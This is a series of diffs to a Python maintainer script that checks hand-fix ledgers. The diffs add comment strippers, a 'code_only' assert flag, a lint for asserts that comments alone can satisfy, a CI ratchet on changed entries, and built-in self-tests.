+            saved_repo, saved_skills = globals()["REPO"], globals()["SKILLS"]
+            buf = io.StringIO()
+            try:
+                globals()["REPO"], globals()["SKILLS"] = root, root / "skills"
+                with contextlib.redirect_stdout(buf):
+                    rc = changed(base_sha)
+            finally:
+                globals()["REPO"], globals()["SKILLS"] = saved_repo, saved_skills
+            if rc != expected_rc:
+                out.append(f"ratchet case {label}: expected exit {expected_rc}, got {rc}. "
+                           f"Output: {buf.getvalue().strip()[:400]}")
+            return buf.getvalue()
+
+        def prose_and_weaken_code():
+            e = json.loads(json.dumps(strong_base_entries))
+            e[0]["why"] = "touched so the ledger is in the diff"
+            (skill / "handfixes.json").write_text(ledger(e), encoding="utf-8")
+            (skill / rel_go).write_text(weak_src, encoding="utf-8")
+        run_from(strong_base, "D-newly-weakened-by-code-change", prose_and_weaken_code, 1)
+
+    return out
 
 
 def self_test() -> int:
@@ -821,6 +1077,73 @@ def self_test() -> int:
         expect(any("not a boolean" in f for f in typo_failures),
                f"the ledger gate must reject a non-boolean code_only, got {typo_failures}")
 
+    # --- `code_only` may only ever make an assert STRONGER -------------------
+    # A `not_contains` assert is an ABSENCE check, and whole-file is its
+    # strongest form. Counting comment-stripped source there would HIDE a banned
+    # pattern resurrected inside a comment - the flag reading as a hardening
+    # while acting as a downgrade. So it is refused, and `not_contains` is
+    # always whole-file. Proved on the exact fixture: the banned needle survives
+    # ONLY in a comment.
+    with tempfile.TemporaryDirectory() as td:
+        skill = Path(td) / "skills" / "fixture"
+        (skill / "cli" / "internal" / "mcp").mkdir(parents=True)
+        tools_go = skill / "cli" / "internal" / "mcp" / "tools.go"
+        banned = 'fmt.Sprintf("%v", v), 1)'
+        ledger = skill / "handfixes.json"
+
+        def run_ledger(assert_obj, src):
+            tools_go.write_text(src, encoding="utf-8")
+            ledger.write_text(json.dumps({"handfixes": [{"id": "nc", "asserts": [assert_obj]}]}),
+                              encoding="utf-8")
+            saved = globals()["SKILLS"]
+            try:
+                globals()["SKILLS"] = skill.parent
+                return check_skill("fixture")
+            finally:
+                globals()["SKILLS"] = saved
+
+        rel_nc = "cli/internal/mcp/tools.go"
+        broken = "// was: " + banned + "\nfunc ok() {}\n"   # banned needle: comment only
+        good = "// was: nothing\nfunc ok() {}\n"            # banned needle: absent
+
+        plain = {"file": rel_nc, "not_contains": banned}
+        expect(any("REGRESSED" in f for f in run_ledger(plain, broken)),
+               "not_contains must FIRE when the banned needle reappears inside a comment")
+        expect(run_ledger(plain, good) == [],
+               "not_contains must stay SILENT when the banned needle is gone")
+
+        for flag in (True, False):
+            flagged = {"file": rel_nc, "not_contains": banned, "code_only": flag}
+            fails_broken = run_ledger(flagged, broken)
+            expect(any("no 'contains' needle" in f for f in fails_broken),
+                   f"code_only={flag} on a not_contains-only assert must be REFUSED as a usage "
+                   f"error, not applied; got {fails_broken}")
+            expect(all("REGRESSED" not in f for f in fails_broken),
+                   "the refusal replaces the check; it must not also claim a regression verdict")
+            fails_good = run_ledger(flagged, good)
+            expect(any("no 'contains' needle" in f for f in fails_good),
+                   f"code_only={flag} on a not_contains-only assert must be refused even when the "
+                   f"file is clean - it is a ledger error, not a file verdict; got {fails_good}")
+
+        # The regression this refusal exists to prevent: applying the strip to
+        # the absence check would have made the BROKEN fixture pass.
+        stripped_broken, _ = strip_comments(rel_nc, broken)
+        expect(banned in broken and stripped_broken is not None and banned not in stripped_broken,
+               "fixture drift: the banned needle must be present whole-file and absent once "
+               "comments are stripped - otherwise this case proves nothing")
+
+        # And the flag is still accepted, and still strengthening, where it
+        # belongs: on a `contains` assert (including one that carries both keys).
+        both = {"file": rel_nc, "contains": "func ok()", "not_contains": banned, "code_only": True}
+        expect(any("REGRESSED" in f and "present again" in f for f in run_ledger(both, broken)),
+               "on an assert carrying both keys, code_only scopes the contains half while "
+               "not_contains still reads the whole file")
+        expect(run_ledger(both, good) == [],
+               "the both-keys assert must be silent on good input")
+
+    # --- the --changed ratchet fires only on NEW or NEWLY WEAKENED asserts ---
+    failures.extend(_self_test_ratchet())
+
     if failures:
         print("FAIL: check_handfixes self-test\n")
         for f in failures:
@@ -828,8 +1151,12 @@ def self_test() -> int:
         return 1
     print("PASS: check_handfixes self-test - strippers keep code and literals and drop comments in "
           "Go/Python/Markdown, JSON and extension-less files report no stripper, issue #252's "
-          "reproduction is silent before the code is deleted and fires after, and a non-boolean "
-          "code_only is rejected rather than silently buying the assert an exemption.")
+          "reproduction is silent before the code is deleted and fires after, a non-boolean "
+          "code_only is rejected rather than silently buying the assert an exemption, `code_only` "
+          "is refused on an assert with no `contains` so a not_contains check can never be "
+          "weakened by it (proved on a needle that survives only in a comment), and the --changed "
+          "ratchet passes a prose-only edit to a pre-existing weak assert while failing a newly "
+          "added or newly weakened one.")
     return 0
 
 

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -131,6 +131,7 @@ import json
 import sys
 from collections import Counter
 from pathlib import Path
+from typing import Callable
 
 REPO = Path(__file__).resolve().parents[2]
 SKILLS = REPO / "skills"
@@ -446,7 +447,7 @@ def lint_skill(slug: str) -> list[WeakAssert]:
 
 
 def lint_entries(slug: str, skill_dir: Path, entries: list,
-                 read_file=None) -> list[WeakAssert]:
+                 read_file: "Callable[[str], str | None] | None" = None) -> list[WeakAssert]:
     """Find every comment-satisfiable `contains` assert in `entries`.
 
     `read_file(rel)` returns the target file's text, or None when it does not
@@ -458,12 +459,13 @@ def lint_entries(slug: str, skill_dir: Path, entries: list,
     they are always evaluated whole-file, which is their strongest form, so
     there is no comment-weak shape for one to be in.
     """
-    if read_file is None:
-        def read_file(rel: str) -> str | None:
-            fpath = skill_dir / rel
-            if not fpath.exists():
-                return None
-            return fpath.read_text(encoding="utf-8", errors="replace")
+    def _from_worktree(rel: str) -> str | None:
+        fpath = skill_dir / rel
+        if not fpath.exists():
+            return None
+        return fpath.read_text(encoding="utf-8", errors="replace")
+
+    read = read_file or _from_worktree
 
     weak: list[WeakAssert] = []
     for hf in entries:
@@ -477,7 +479,7 @@ def lint_entries(slug: str, skill_dir: Path, entries: list,
             rel = a.get("file")
             if not rel:
                 continue
-            content = read_file(rel)
+            content = read(rel)
             if content is None:
                 continue
             stripped, _ = strip_comments(rel, content)
@@ -1061,7 +1063,9 @@ def self_test() -> int:
         def count(a_code_only, content):
             body = content
             if a_code_only:
-                body, _ = strip_comments(rel, content)
+                body, why = strip_comments(rel, content)
+                if body is None:
+                    raise AssertionError(f"fixture drift: no stripper for {rel} ({why})")
             return body.count(weak_needle)
 
         expect(count(False, cfg.read_text()) == 2, "fixture: expected 2 raw occurrences before")

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -27,7 +27,9 @@ Ledger schema (skills/<slug>/handfixes.json):
           "spec_encode_followup": "...",      // optional
           "asserts": [
             {"file": "cli/internal/store/store.go", "contains": "\"id_\"", "min_count": 2},
-            {"file": "cli/internal/mcp/tools.go",   "not_contains": "fmt.Sprintf(\"%v\", v), 1)"}
+            {"file": "cli/internal/mcp/tools.go",   "not_contains": "fmt.Sprintf(\"%v\", v), 1)"},
+            {"file": "cli/internal/config/config.go", "contains": "stripAuthScheme(",
+             "min_count": 1, "code_only": true}
           ]
         }
       ]
@@ -38,11 +40,40 @@ clobber; "upstreamed" = also fixed in the press (a reprint from a fixed press
 regenerates it) but the back-port must still be present today. Both are
 asserted present.
 
+Comment-satisfiable asserts (issue #252)
+----------------------------------------
+An assert counts a substring in the WHOLE file, comments included. So an assert
+whose needle a doc comment also contains stays green after the code it guards is
+deleted - the exact failure this gate exists to catch. Measured on this repo:
+2579 asserts across 409 entries in 65 ledgers, of which 26 are satisfiable by
+comments alone today.
+
+Those 26 are not all bugs. Some deliberately assert on a comment (`Hand-wired:`
+markers, an explanatory paragraph a reprint must not drop). So the fix is not to
+strip comments everywhere - that would false-RED every legitimate marker assert -
+but to make the author say which one they meant, with `code_only`:
+
+    absent (default)  count the whole file, as today. The `--lint-asserts` lint
+                      reports the assert when comments alone can satisfy it.
+    true              count comment-stripped source only. Strictly stronger; the
+                      needle must survive in code.
+    false             "this assert deliberately targets a comment." Whole-file
+                      count, and the lint stays quiet about it.
+
+Comment syntax is per language and one stripper does NOT cover all of them:
+Go and go.mod use `//` and `/* */` (string, rune and raw-string literals are
+respected, so a `//` inside a URL literal is not mistaken for a comment); Python
+and shell use `#`; Markdown uses `<!-- -->`; JSON has no comment syntax at all,
+so `code_only` on a .json target is a USAGE ERROR rather than a silent no-op -
+accepting it there would hand the author assurance the format cannot provide.
+
 Usage:
     check_handfixes.py                 # every skill with a ledger
     check_handfixes.py --slug axcient  # one skill
     check_handfixes.py --all           # explicit all (same as no args)
     check_handfixes.py --changed --base <sha>   # PR-diff mode (CI)
+    check_handfixes.py --lint-asserts  # report every comment-satisfiable assert
+    check_handfixes.py --self-test     # both-directions proof of the above
 
 Exit codes:
     0  every ledger passes (or none exist), or --changed found nothing unrecorded
@@ -65,6 +96,136 @@ from pathlib import Path
 
 REPO = Path(__file__).resolve().parents[2]
 SKILLS = REPO / "skills"
+
+
+# --------------------------------------------------------------------------
+# Comment strippers (issue #252)
+#
+# Each returns the source with comment bytes replaced by spaces - same length,
+# newlines preserved - so a stripped count is directly comparable to a raw one
+# and any reported offset still lines up with the original file.
+# --------------------------------------------------------------------------
+
+
+def strip_c_like(src: str) -> str:
+    """Go and go.mod: blank `//` line comments and `/* */` block comments.
+
+    Interpreted string, rune and raw-string literals are skipped, so the `//` in
+    a `"https://..."` literal is not mistaken for a comment - which matters here
+    because base-URL literals are exactly the kind of thing a ledger asserts on.
+    """
+    out = list(src)
+    i, n = 0, len(src)
+    while i < n:
+        c = src[i]
+        if c in ('"', "'"):
+            quote = c
+            i += 1
+            while i < n:
+                if src[i] == "\\":
+                    i += 2
+                    continue
+                if src[i] == quote or src[i] == "\n":
+                    i += 1
+                    break
+                i += 1
+            continue
+        if c == "`":  # Go raw string: no escapes, may span lines
+            i += 1
+            while i < n and src[i] != "`":
+                i += 1
+            i += 1
+            continue
+        if c == "/" and i + 1 < n and src[i + 1] == "/":
+            while i < n and src[i] != "\n":
+                out[i] = " "
+                i += 1
+            continue
+        if c == "/" and i + 1 < n and src[i + 1] == "*":
+            while i < n and not (src[i] == "*" and i + 1 < n and src[i + 1] == "/"):
+                if src[i] != "\n":
+                    out[i] = " "
+                i += 1
+            for _ in range(2):  # the closing */
+                if i < n:
+                    out[i] = " "
+                    i += 1
+            continue
+        i += 1
+    return "".join(out)
+
+
+def strip_hash(src: str) -> str:
+    """Python and shell: blank `#` comments that are not inside a quoted string."""
+    out = list(src)
+    i, n = 0, len(src)
+    while i < n:
+        c = src[i]
+        if c in ('"', "'"):
+            quote = c
+            i += 1
+            while i < n:
+                if src[i] == "\\":
+                    i += 2
+                    continue
+                if src[i] == quote or src[i] == "\n":
+                    i += 1
+                    break
+                i += 1
+            continue
+        if c == "#":
+            while i < n and src[i] != "\n":
+                out[i] = " "
+                i += 1
+            continue
+        i += 1
+    return "".join(out)
+
+
+def strip_html_comments(src: str) -> str:
+    """Markdown and HTML: blank `<!-- ... -->` comments."""
+    out = list(src)
+    i, n = 0, len(src)
+    while i < n:
+        if src.startswith("<!--", i):
+            end = src.find("-->", i + 4)
+            end = n if end < 0 else end + 3
+            while i < end:
+                if src[i] != "\n":
+                    out[i] = " "
+                i += 1
+            continue
+        i += 1
+    return "".join(out)
+
+
+# Extension -> (stripper, human name). A file type absent from this map has no
+# stripper: `code_only` on it is refused rather than silently treated as a
+# whole-file count, because a no-op that reports success is worse than an error.
+_STRIPPERS = {
+    ".go": (strip_c_like, "Go (// and /* */)"),
+    ".mod": (strip_c_like, "go.mod (//)"),
+    ".py": (strip_hash, "Python (#)"),
+    ".sh": (strip_hash, "shell (#)"),
+    ".bash": (strip_hash, "shell (#)"),
+    ".md": (strip_html_comments, "Markdown (<!-- -->)"),
+}
+
+# File types that genuinely have no comment syntax. Named explicitly so the
+# error message can say WHY instead of "unsupported".
+_NO_COMMENT_SYNTAX = {".json": "JSON has no comment syntax"}
+
+
+def strip_comments(rel: str, content: str) -> tuple[str | None, str]:
+    """Return (stripped content, description), or (None, reason) when the file
+    type has no stripper. Never guesses: an unknown type returns None."""
+    suffix = Path(rel).suffix.lower()
+    if suffix in _STRIPPERS:
+        fn, label = _STRIPPERS[suffix]
+        return fn(content), label
+    if suffix in _NO_COMMENT_SYNTAX:
+        return None, _NO_COMMENT_SYNTAX[suffix]
+    return None, f"no comment stripper is defined for '{suffix or Path(rel).name}'"
 
 
 def _load_ledger(path: Path):
@@ -110,6 +271,24 @@ def check_skill(slug: str) -> list[str]:
                 )
                 continue
             content = fpath.read_text(encoding="utf-8", errors="replace")
+
+            # `code_only: true` counts comment-stripped source instead of the
+            # whole file, so a doc comment can no longer stand in for the code
+            # the assert guards (issue #252).
+            scope = "the file"
+            if a.get("code_only") is True:
+                stripped, why = strip_comments(rel, content)
+                if stripped is None:
+                    failures.append(
+                        f"[{slug}] handfix '{hid}': assert on '{rel}' sets \"code_only\": true, but "
+                        f"{why}. Accepting it there would report a stronger check than was run. "
+                        f"Drop the flag (and narrow the needle instead), or point the assert at a "
+                        f"file whose language has comments."
+                    )
+                    continue
+                content = stripped
+                scope = "the comment-stripped source"
+
             if "contains" in a:
                 needle = a["contains"]
                 min_count = int(a.get("min_count", 1))
@@ -117,7 +296,7 @@ def check_skill(slug: str) -> list[str]:
                 if found < min_count:
                     failures.append(
                         f"[{slug}] handfix '{hid}' REGRESSED in {rel}: expected {min_count}x "
-                        f"`{needle}`, found {found}. A reprint likely clobbered it. Restore the "
+                        f"`{needle}` in {scope}, found {found}. A reprint likely clobbered it. Restore the "
                         f"hand-fix (or, if intentionally changed, update skills/{slug}/handfixes.json). See {doc}."
                     )
             if "not_contains" in a:
@@ -125,11 +304,115 @@ def check_skill(slug: str) -> list[str]:
                 if banned in content:
                     failures.append(
                         f"[{slug}] handfix '{hid}' REGRESSED in {rel}: banned anti-pattern "
-                        f"`{banned}` is present again. A reprint likely reintroduced it. See {doc}."
+                        f"`{banned}` is present again in {scope}. A reprint likely reintroduced it. See {doc}."
                     )
             if "contains" not in a and "not_contains" not in a:
                 failures.append(f"[{slug}] handfix '{hid}': assert for '{rel}' needs 'contains' or 'not_contains'")
     return failures
+
+
+class WeakAssert:
+    """One `contains` assert that comments alone can satisfy.
+
+    "Weak" has a precise, measurable definition here: with comments stripped
+    from the target file the needle no longer reaches `min_count`. That is
+    exactly the shape issue #252 describes - delete the guarded code, leave the
+    doc comment, and the gate still reports PASS. An assert whose needle also
+    appears in a comment but still clears `min_count` in code is NOT weak: the
+    code has to be there for it to pass.
+    """
+
+    __slots__ = ("slug", "hid", "rel", "needle", "min_count", "raw", "stripped")
+
+    def __init__(self, slug, hid, rel, needle, min_count, raw, stripped):
+        self.slug, self.hid, self.rel = slug, hid, rel
+        self.needle, self.min_count = needle, min_count
+        self.raw, self.stripped = raw, stripped
+
+    def key(self) -> str:
+        return f"{self.slug}/{self.hid}/{self.rel}/{self.needle}"
+
+    def describe(self) -> str:
+        return (
+            f"[{self.slug}] handfix '{self.hid}': assert on {self.rel} needs {self.min_count}x "
+            f"`{self.needle}` and finds {self.raw}, but only {self.stripped} of those are in CODE - "
+            f"the rest are in comments. Delete the guarded code, leave the comment, and this assert "
+            f"still passes.\n"
+            f"      Fix it one of three ways: narrow the needle to something only the code can "
+            f"contain (a full signature, an assignment, a call site); add \"code_only\": true to "
+            f"count comment-stripped source; or, if the comment IS the thing a reprint must not "
+            f"drop, add \"code_only\": false to say so on purpose."
+        )
+
+
+def lint_skill(slug: str) -> list[WeakAssert]:
+    """Find every comment-satisfiable `contains` assert in one skill's ledger.
+
+    Asserts that declare `code_only` either way are exempt: `true` already
+    counts code only, and `false` is the author saying the comment is the point.
+    """
+    skill_dir = SKILLS / slug
+    ledger_path = skill_dir / "handfixes.json"
+    if not ledger_path.exists():
+        return []
+    data, err = _load_ledger(ledger_path)
+    if err or data is None:
+        return []
+    return lint_entries(slug, skill_dir, data["handfixes"])
+
+
+def lint_entries(slug: str, skill_dir: Path, entries: list) -> list[WeakAssert]:
+    weak: list[WeakAssert] = []
+    for hf in entries:
+        hid = hf.get("id", "<unnamed>")
+        for a in hf.get("asserts", []):
+            if "contains" not in a or "code_only" in a:
+                continue
+            rel = a.get("file")
+            if not rel:
+                continue
+            fpath = skill_dir / rel
+            if not fpath.exists():
+                continue
+            content = fpath.read_text(encoding="utf-8", errors="replace")
+            stripped, _ = strip_comments(rel, content)
+            if stripped is None:
+                continue  # no comment syntax (JSON, NOTICE): nothing to be weak about
+            needle = a["contains"]
+            min_count = int(a.get("min_count", 1))
+            raw_n = content.count(needle)
+            code_n = stripped.count(needle)
+            if raw_n >= min_count and code_n < min_count:
+                weak.append(WeakAssert(slug, hid, rel, needle, min_count, raw_n, code_n))
+    return weak
+
+
+def lint_asserts(slug: str | None, strict: bool) -> int:
+    """Report every comment-satisfiable assert in the repo.
+
+    Advisory by default (exit 0) and hard under --strict. The reason it is not
+    hard by default is measured, not squeamish: 26 of the 2280 `contains`
+    asserts live in this shape today, several of them deliberately (a
+    `Hand-wired:` marker IS a comment). Turning a 26-finding lint into a merge
+    gate before those are annotated would red main for everyone and get the
+    lint ignored - the false-RED failure mode. The ratchet lives in --changed
+    instead, where a ledger entry that is NEW OR EDITED in the change-set is
+    linted hard, so the number can only go down.
+    """
+    slugs = [slug] if slug else sorted(p.parent.name for p in SKILLS.glob("*/handfixes.json"))
+    weak: list[WeakAssert] = []
+    for s in slugs:
+        weak.extend(lint_skill(s))
+    if not weak:
+        print("PASS: no comment-satisfiable asserts found.")
+        return 0
+    label = "FAIL" if strict else "REPORT"
+    print(f"{label}: {len(weak)} assert(s) can be satisfied by comments alone "
+          f"(the guarded code could be gone and the gate would still pass):\n")
+    for w in weak:
+        print(f"  - {w.describe()}\n")
+    print("See docs/reprint-survival.md and issue #252.")
+    return 1 if strict else 0
 
 
 def brief(slug: str | None) -> int:
@@ -322,12 +605,190 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
             f"the spec). See docs/reprint-survival.md."
         )
 
+    # The issue #252 ratchet. A ledger entry that is NEW or EDITED in this
+    # change-set must not carry an assert comments alone can satisfy. Scoped to
+    # the entries the diff actually touched (not the whole ledger) so adding one
+    # entry to a connector is never blocked by a pre-existing weak assert in a
+    # neighbouring entry - the number can only go down, and nobody is taxed for
+    # somebody else's backlog.
+    weak_new: list[WeakAssert] = []
+    for slug in sorted(ledger_touched):
+        skill_dir = SKILLS / slug
+        rel = f"skills/{slug}/handfixes.json"
+        data, err = _load_ledger(REPO / rel)
+        if err or data is None:
+            continue  # the ledger gate itself reports an unreadable ledger
+        base_entries = _entries_at_base(base, rel)
+        for hf in data["handfixes"]:
+            if base_entries is not None and _canonical(hf) in base_entries:
+                continue  # byte-identical to base: not this change-set's entry
+            weak_new.extend(lint_entries(slug, skill_dir, [hf]))
+
+    if failures or weak_new:
+        if failures:
+            print("FAIL: generated-file hand-edits not recorded in a hand-fix ledger:\n")
+            for f in failures:
+                print(f"  - {f}")
+            print()
+        if weak_new:
+            print("FAIL: hand-fix ledger entries added or edited in this change carry asserts that "
+                  "comments alone can satisfy (issue #252):\n")
+            for w in weak_new:
+                print(f"  - {w.describe()}\n")
+        return 1
+    print("PASS: every generated-file hand-edit in this change is recorded (or part of a reprint), "
+          "and no ledger entry it touches has a comment-satisfiable assert.")
+    return 0
+
+
+def _canonical(entry: object) -> str:
+    """A stable serialization used only to tell "unchanged since base" apart
+    from "new or edited here"."""
+    return json.dumps(entry, sort_keys=True, separators=(",", ":"))
+
+
+def _entries_at_base(base: str, rel: str) -> set[str] | None:
+    """The base revision's handfix entries, canonicalized. None when the ledger
+    does not exist at base (a brand-new ledger: every entry is this change's) or
+    cannot be read."""
+    import subprocess
+
+    try:
+        out = subprocess.run(
+            ["git", "-C", str(REPO), "show", f"{base}:{rel}"],
+            capture_output=True, text=True,
+        )
+    except (OSError, subprocess.SubprocessError):
+        return None
+    if out.returncode != 0:
+        return None
+    try:
+        data = json.loads(out.stdout)
+    except json.JSONDecodeError:
+        return None
+    entries = data.get("handfixes")
+    if not isinstance(entries, list):
+        return None
+    return {_canonical(e) for e in entries}
+
+
+def self_test() -> int:
+    """Both-directions proof for the comment strippers, `code_only`, and the lint.
+
+    The centrepiece is issue #252's own reproduction, rebuilt as a fixture: a Go
+    file whose guarded symbol has been renamed while its doc comment still names
+    the old one. Today's whole-file count passes. `code_only: true` must fail,
+    and the lint must have flagged the assert BEFORE the code was deleted.
+    """
+    import tempfile
+
+    failures: list[str] = []
+
+    def expect(cond: bool, msg: str) -> None:
+        if not cond:
+            failures.append(msg)
+
+    # --- strippers: fire on comments, stay silent on code and on literals ----
+    go_src = (
+        '// stripAuthScheme trims a leading "Token " prefix.\n'
+        'func stripAuthScheme(v string) string { return v }\n'
+        '/* stripAuthScheme again, in a block comment */\n'
+        'const base = "https://example.test//not-a-comment"\n'
+        'const raw = `stripAuthScheme inside a raw string`\n'
+    )
+    go_stripped = strip_c_like(go_src)
+    expect(go_src.count("stripAuthScheme") == 4,
+           f"fixture drift: expected 4 raw occurrences, got {go_src.count('stripAuthScheme')}")
+    expect(go_stripped.count("stripAuthScheme") == 2,
+           f"strip_c_like must leave the 2 code occurrences (the func and the raw string), "
+           f"got {go_stripped.count('stripAuthScheme')}")
+    expect("https://example.test//not-a-comment" in go_stripped,
+           "strip_c_like treated the // inside a URL literal as a comment")
+    expect(len(go_stripped) == len(go_src),
+           "strippers must preserve length so raw and stripped counts stay comparable")
+
+    py_src = '# TOKEN in a comment\ntoken = "TOKEN in a string"\nTOKEN = 1\n'
+    py_stripped = strip_hash(py_src)
+    expect(py_stripped.count("TOKEN") == 2,
+           f"strip_hash must leave the 2 non-comment occurrences, got {py_stripped.count('TOKEN')}")
+
+    md_stripped = strip_html_comments("<!-- MARKER -->\nMARKER in prose\n")
+    expect(md_stripped.count("MARKER") == 1,
+           f"strip_html_comments must leave the 1 prose occurrence, got {md_stripped.count('MARKER')}")
+
+    expect(strip_comments("x.json", "{}")[0] is None,
+           "JSON must report NO stripper - it has no comment syntax to strip")
+    expect(strip_comments("NOTICE", "text")[0] is None,
+           "an extension-less file must report no stripper rather than guessing")
+
+    # --- the issue's reproduction, end to end -------------------------------
+    with tempfile.TemporaryDirectory() as td:
+        root = Path(td)
+        skill = root / "skills" / "fixture"
+        (skill / "cli" / "internal" / "config").mkdir(parents=True)
+        cfg = skill / "cli" / "internal" / "config" / "config.go"
+        # BEFORE: the guarded code exists, and so does its doc comment.
+        cfg.write_text(
+            "// stripAuthScheme removes a scheme prefix so the token is sent bare.\n"
+            "func stripAuthScheme(v string) string { return v }\n",
+            encoding="utf-8",
+        )
+        rel = "cli/internal/config/config.go"
+        weak_needle = "stripAuthScheme"
+
+        def count(a_code_only, content):
+            body = content
+            if a_code_only:
+                body, _ = strip_comments(rel, content)
+            return body.count(weak_needle)
+
+        expect(count(False, cfg.read_text()) == 2, "fixture: expected 2 raw occurrences before")
+        expect(count(True, cfg.read_text()) == 1, "fixture: expected 1 code occurrence before")
+
+        entry = {"id": "msp-token-auth-scheme-prefix",
+                 "asserts": [{"file": rel, "contains": weak_needle, "min_count": 1}]}
+        weak = lint_entries("fixture", skill, [entry])
+        expect(len(weak) == 0,
+               "the lint must stay SILENT while the code is present and clears min_count")
+
+        # AFTER: a reprint clobbers the function; the doc comment survives.
+        cfg.write_text(
+            "// stripAuthScheme removes a scheme prefix so the token is sent bare.\n"
+            "func authHeader(v string) string { return v }\n",
+            encoding="utf-8",
+        )
+        expect(count(False, cfg.read_text()) == 1,
+               "fixture: the comment alone must still satisfy a whole-file count")
+        expect(count(True, cfg.read_text()) == 0,
+               "fixture: comment-stripped, the needle must be gone")
+
+        weak = lint_entries("fixture", skill, [entry])
+        expect(len(weak) == 1,
+               "the lint must FIRE once the needle survives only in a comment")
+        if weak:
+            expect("comment" in weak[0].describe(),
+                   "the lint message must say the occurrences are in comments")
+
+        # And the opt-in flag turns the same situation into a hard failure.
+        strict_entry = dict(entry)
+        strict_entry["asserts"] = [dict(entry["asserts"][0], code_only=True)]
+        expect(len(lint_entries("fixture", skill, [strict_entry])) == 0,
+               "an assert that already declares code_only must be exempt from the lint")
+
+        # `code_only: false` is the deliberate comment assert: also exempt.
+        ack_entry = dict(entry)
+        ack_entry["asserts"] = [dict(entry["asserts"][0], code_only=False)]
+        expect(len(lint_entries("fixture", skill, [ack_entry])) == 0,
+               "an assert that declares code_only: false is a deliberate comment assert")
+
     if failures:
-        print("FAIL: generated-file hand-edits not recorded in a hand-fix ledger:\n")
+        print("FAIL: check_handfixes self-test\n")
         for f in failures:
             print(f"  - {f}")
         return 1
-    print("PASS: every generated-file hand-edit in this change is recorded (or part of a reprint).")
+    print("PASS: check_handfixes self-test - strippers keep code and literals and drop comments in "
+          "Go/Python/Markdown, JSON and extension-less files report no stripper, and issue #252's "
+          "reproduction is silent before the code is deleted and fires after.")
     return 0
 
 
@@ -347,8 +808,20 @@ def main() -> int:
                     help="--changed only: if the base ref cannot be resolved, print SKIP and "
                          "exit 0 instead of the INTERNAL ERROR exit 2. Verifies NOTHING. For "
                          "local checkouts without a base ref; CI must never pass this.")
+    ap.add_argument("--lint-asserts", action="store_true",
+                    help="report every assert that comments alone can satisfy (issue #252). "
+                         "Advisory; add --strict to make it fail.")
+    ap.add_argument("--strict", action="store_true",
+                    help="--lint-asserts only: exit 1 on findings instead of reporting them.")
+    ap.add_argument("--self-test", action="store_true",
+                    help="run the built-in both-directions proof of the comment strippers, "
+                         "code_only and the weak-assert lint, then exit")
     args = ap.parse_args()
 
+    if args.self_test:
+        return self_test()
+    if args.lint_asserts:
+        return lint_asserts(args.slug, strict=args.strict)
     if args.discover:
         return discover()
     if args.changed:

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -83,6 +83,27 @@ and shell use `#`; Markdown uses `<!-- -->`; JSON has no comment syntax at all,
 so `code_only` on a .json target is a USAGE ERROR rather than a silent no-op -
 accepting it there would hand the author assurance the format cannot provide.
 
+How far each stripper is actually trusted, measured rather than assumed:
+
+  strip_c_like   agrees with Go's own `go/scanner` (ScanComments) on every
+                 comment position in all 19616 .go files under skills/ - 0 files
+                 where it blanked real code, 0 where it missed a real comment.
+                 The comparison is not vacuous: swapping in a naive
+                 blank-from-`//`-to-EOL stripper makes 825 files disagree.
+  strip_hash     is a lexer approximation, not a Python/shell parser. It treats
+                 shell parameter expansion as a comment (`v=${TAG##*-v}`) and
+                 can blank a `#` inside a triple-quoted string. Unreachable
+                 today: across 2579 asserts the target extensions are .go 1674,
+                 .json 559, .md 340, .mod 2, extension-less 4 - zero .py and
+                 zero .sh.
+  strip_html_comments blanks to end-of-file on an unterminated `<!--`. None of
+                 the 109 distinct .md files asserts target contains one.
+
+Those two limits are stated here rather than fixed because a stripper only ever
+runs under `code_only: true`, which no ledger uses yet; the moment a .py, .sh or
+malformed-.md target appears, the limit becomes reachable and the stripper needs
+a real parser.
+
 Usage:
     check_handfixes.py                 # every skill with a ledger
     check_handfixes.py --slug axcient  # one skill
@@ -383,9 +404,6 @@ class WeakAssert:
         self.slug, self.hid, self.rel = slug, hid, rel
         self.needle, self.min_count = needle, min_count
         self.raw, self.stripped = raw, stripped
-
-    def key(self) -> str:
-        return f"{self.slug}/{self.hid}/{self.rel}/{self.needle}"
 
     def identity(self) -> str:
         """What makes this the SAME assert across two revisions.
@@ -753,8 +771,9 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
             print("Only asserts this change introduced or weakened are listed. Asserts that were "
                   "already comment-satisfiable before it are NOT your bill: `--lint-asserts` "
                   "reports those repo-wide, advisory.")
-            print("The `code_only` tri-state is documented in docs/reprint-survival.md "
-                  "(\"Ledger schema\") and in this file's module docstring. See issue #252.")
+            print("The `code_only` tri-state is documented under \"`code_only`: what the "
+                  "`contains` needle is counted in\" in docs/reprint-survival.md, and in this "
+                  "file's module docstring. See issue #252.")
         return 1
     print("PASS: every generated-file hand-edit in this change is recorded (or part of a reprint), "
           "and no assert this change added or weakened is comment-satisfiable.")

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -129,6 +129,7 @@ from __future__ import annotations
 import argparse
 import json
 import sys
+from collections import Counter
 from pathlib import Path
 
 REPO = Path(__file__).resolve().parents[2]
@@ -732,6 +733,11 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
     #   * leaving an assert alone while editing the ledger and changing the
     #     guarded file so the needle survives only in comments -> also fires:
     #     same identity, not weak at base, weak now.
+    #   * a SECOND copy of an identity that was already weak once -> fires. The
+    #     tally is a multiset, not a set: N weak at base exempts exactly N weak
+    #     now, so duplicating a weak assert is still adding one. Duplicate
+    #     identities are a real shape here, not a hypothetical - axcient carries
+    #     two asserts with identical (file, needle, min_count) today.
     #
     # An entry-level comparison (the first cut of this ratchet) got the first
     # case wrong: any edit to an entry re-linted every assert inside it, so a
@@ -745,17 +751,18 @@ def changed(base: str, allow_missing_base: bool = False) -> int:
         if err or data is None:
             continue  # the ledger gate itself reports an unreadable ledger
         base_entries = _entries_at_base(base, rel)
-        if base_entries is None:
-            already_weak: set[str] = set()  # brand-new ledger: nothing pre-exists
-        else:
-            already_weak = {
+        already_weak: Counter[str] = Counter()
+        if base_entries is not None:  # None == brand-new ledger: nothing pre-exists
+            already_weak = Counter(
                 w.identity()
                 for w in lint_entries(slug, skill_dir, base_entries,
                                       read_file=_base_reader(base, slug))
-            }
+            )
         for w in lint_entries(slug, skill_dir, data["handfixes"]):
-            if w.identity() not in already_weak:
-                weak_new.append(w)
